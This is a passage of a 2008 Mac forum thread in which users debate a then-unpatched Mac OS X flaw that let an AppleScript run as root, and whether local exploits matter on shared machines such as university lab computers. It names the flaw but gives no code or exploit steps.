That wouldn't work on publicly accessible machines like in universities. People don't have the password there.
     
mduell
Posting Junkie
Join Date: Oct 2005
Location: Houston, TX
Status: Offline
Jun 23, 2008, 09:18 PM
 
I'm surprised this hasn't been fixed yet.
     
EuropeBetterThanAmerica
Fresh-Faced Recruit
Join Date: Jun 2008
Location: Europe
Status: Offline
Jun 24, 2008, 03:48 AM
 
Does Mac OS X have an uneventful life so far?
( Last edited by EuropeBetterThanAmerica; Jun 24, 2008 at 03:49 AM. Reason: typo)

24" iMac >> MacBook >> iBookG4
     
analogika
Posting Junkie
Join Date: Feb 2005
Location: 888500128
Status: Offline
Jun 24, 2008, 04:22 AM
 
yes.
     
- - e r i k - -
Posting Junkie
Join Date: May 2001
Location: Brisbane, Australia
Status: Offline
Jun 25, 2008, 01:28 AM
 
Two fallacies noted in this thread:

1) Security by obscurity

By making this bug known and public isn't making it more of a threat. It does however put pressure on Apple to fix it and on users to protect themselves.

2) Local exploits

If a wannabe hacker has physical access to your machine all bets are off.

[ fb ] [ flickr ] [] [scl] [ last ] [ plaxo ]
     
P
Moderator
Join Date: Apr 2000
Location: Gothenburg, Sweden
Status: Offline
Jun 25, 2008, 02:05 AM
 
Originally Posted by - - e r i k - - View Post
2) Local exploits

If a wannabe hacker has physical access to your machine all bets are off.
Yes, that is the argument that always gets trotted out. Two things about it: It doesn't apply in a public environment, such as the inside of an Apple Store or a computer lab at a school. If you'd start pulling the machine apart, people would notice and stop you. If you run a program, no one would notice.

The other thing is what has happened - a trojan can run as root without you writing your admin password, and even do so from a regular user account.
     
Big Mac
Clinically Insane
Join Date: Oct 2000
Location: Los Angeles
Status: Offline
Jun 25, 2008, 02:35 AM
 
Well said, P. The notion that local exploits don't mean anything because a box is compromised if someone has access to its keyboard is illogical and is to me an excuse for lazy programming. OS X enforces a lot of local security measures that Mac users have had to adapt to, and given that focus on security it doesn't make much sense if there are well known exploits that can defeat those measures easily. Single user mode is one potential local exploit that's too easy to access in my opinion, but at least Apple provides the firmware password option to remedy that if one wishes to. One should not be able to easily defeat local security only with access to a keyboard.
( Last edited by Big Mac; Jun 25, 2008 at 02:48 AM. )

"The natural progress of things is for liberty to yield and government to gain ground." TJ
     
Horsepoo!!!
Banned
Join Date: Jun 2003
Status: Offline
Jun 25, 2008, 08:10 AM
 
Originally Posted by Big Mac View Post
Well said, P. The notion that local exploits don't mean anything because a box is compromised if someone has access to its keyboard is illogical and is to me an excuse for lazy programming. OS X enforces a lot of local security measures that Mac users have had to adapt to, and given that focus on security it doesn't make much sense if there are well known exploits that can defeat those measures easily. Single user mode is one potential local exploit that's too easy to access in my opinion, but at least Apple provides the firmware password option to remedy that if one wishes to. One should not be able to easily defeat local security only with access to a keyboard.
In most cases, if someone has managed to beat other forms of security to get a physical hold of your machine, firmware passwords or OS X passwords won't make a difference in the grand scheme of things. This guy has dodged security guards or has managed to break into your house unnoticed. This guy will likely take the hard drive with him whether the guards, the university lab officials or you like it or not. It's certainly the easiest part of the whole process.

As erik has said... if someone has access to your machine, all bets are off. Hackers won't spend time trying to hack through local security with the keyboard when they're right next to the effin' machine. No amount of clever software security measures will stop this person from opening your computer up and taking the data with him.

Firmware passwords exist so people get warm fuzzy feelings of (false) security.
( Last edited by Horsepoo!!!; Jun 25, 2008 at 08:19 AM. )
     
TETENAL
Addicted to MacNN
Join Date: Aug 2004
Location: FFM
Status: Offline
Jun 25, 2008, 08:57 AM
 
Sorry, but there is a major difference between opening a computer case and taking the hard drive with you and running an AppleScript to become root when it comes to places like university computer labs. The former can hardly be done when other people are around; the latter can.
     
P
Moderator
Join Date: Apr 2000
Location: Gothenburg, Sweden
Status: Offline
Jun 25, 2008, 10:48 AM
 
What TETENAL said. On Apple's current iMacs, getting to the hard drive and disassembling it takes some fifteen minutes and requires special tools. It takes about as long to put it back together, and anyone in the same room will know that you're up to no good. Not sure about the Mac mini, but it's about the same. Running a script like this would take seconds, and it can be done in the background while you're browsing or whatever.
     
Hal Itosis
Grizzled Veteran
Join Date: Mar 2004
Status: Offline
Jun 25, 2008, 11:49 AM
 
Originally Posted by Horsepoo!!! View Post
In most cases, if someone has managed to beat other forms of security to get a physical hold of your machine, firmware passwords or OS X passwords won't make a difference in the grand scheme of things. This guy has dodged security guards or has managed to break into your house unnoticed. This guy will likely take the hard drive with him whether the guards, the university lab officials or you like it or not. It's certainly the easiest part of the whole process.
 
Have you ever been in a university computer lab?
They're not stocked with MacBooks we can just slip into our knapsacks.
Towers, eMacs and iMacs mostly... tethered to the tabletop.
Often a paid student lab monitor is present, or at least other students are there.
Risk stealing a hard drive? What ever for?

Originally Posted by Horsepoo!!! View Post
Firmware passwords exist so people get warm fuzzy feelings of (false) security.
 
Those can also be bolstered by solder and/or rubber cement (to obviate RAM tinkering).
[plus Permatex Locktite, stripped screw-heads, etc., etc.]

Sure, if someone's Mac is stolen it's end of story... but in office environments, etc., firmware passwords are fairly effective (so long as they're used along with other anti-theft measures in mind).
( Last edited by Hal Itosis; Jun 25, 2008 at 11:57 AM. )
-HI-
     
mduell
Posting Junkie
Join Date: Oct 2005
Location: Houston, TX
Status: Offline
Reply With Quote
Jun 25, 2008, 06:11 PM
 
Originally Posted by - - e r i k - - View Post
2) Local exploits

If a wannabe hacker has physical access to your machine all bets are off.
Local exploits have nothing to do with physical access. In this context "local" is contrasted to "remote", and just means the attacker has an unprivileged account on the machine.
     
unhappyending
Fresh-Faced Recruit
Join Date: Feb 2007
Location: Earth.
Status: Offline
Reply With Quote
Jun 25, 2008, 06:14 PM
 
I read about this, I just deleted ARDAgent.
 Mac mini 1.66GHz Intel Core Duo, OS X 10.5.3, 1GB Ram.
 iMac G3 350MHz PowerPC G3, OS X 10.3.9, 256MB Ram
     
turtle777
Clinically Insane
Join Date: Jun 2001
Location: planning a comeback !
Status: Offline
Reply With Quote
Jun 25, 2008, 07:57 PM
 
Man, I just had this scary thought that someone could easily create an app that gains root access, installs a key logger and then transmits the harvested data via the internet.

Can you imagine the yield from an infected Apple Store ?

Even if it's just running one day, you'd get tons of passwords.

-t
     
- - e r i k - -
Posting Junkie
Join Date: May 2001
Location: Brisbane, Australia
Status: Offline
Reply With Quote
Jun 25, 2008, 08:19 PM
 
Originally Posted by mduell View Post
Local exploits have nothing to do with physical access. In this context "local" is contrasted to "remote", and just means the attacker has an unprivileged account on the machine.
Correct me if I'm wrong, but this exploit only works with physical access (gui user + terminal), no?

     
Horsepoo!!!
Banned
Join Date: Jun 2003
Status: Offline
Reply With Quote
Jun 25, 2008, 08:26 PM
 
Originally Posted by P View Post
What TETENAL said. On Apple's current iMacs, getting to the hard drive and disassembling it takes some fifteen minutes and requires special tools. It takes about as long to put it back together, and anyone in the same room will know that you're up to no good. Not sure about the Mac mini, but it's about the same. Running a script like this would take seconds, and it can be done in the background while you're browsing or whatever.
You gotta be shittin' me. Some computers do in fact make it difficult to access the hard drive, but with other computers (like, say, a Mac Pro) it's a matter of snipping a lock, pulling a latch, pulling a drawer and snatching the HD with zero tools. You might be slow to remove hard drives, but even I can pull a hard drive from a machine within 1 or 2 minutes.

Not sure about the Mac mini? WTF...nobody's gonna remove a Mac mini drive, they'll just drop the Mac mini in a small bag and run.

And NO...everyone who thinks a hacker will try to hack into a computer lab computer is dumb...those machines are ghosted everyday. Even if the lab computer is compromised, the next day it won't be. And even if a hacker wanted to get to data on a lab computer, why are people insisting that it would (or rather wouldn't be) when tons of people are watching? Come on. Think McFly.

'tards be invadin' MacNN.
     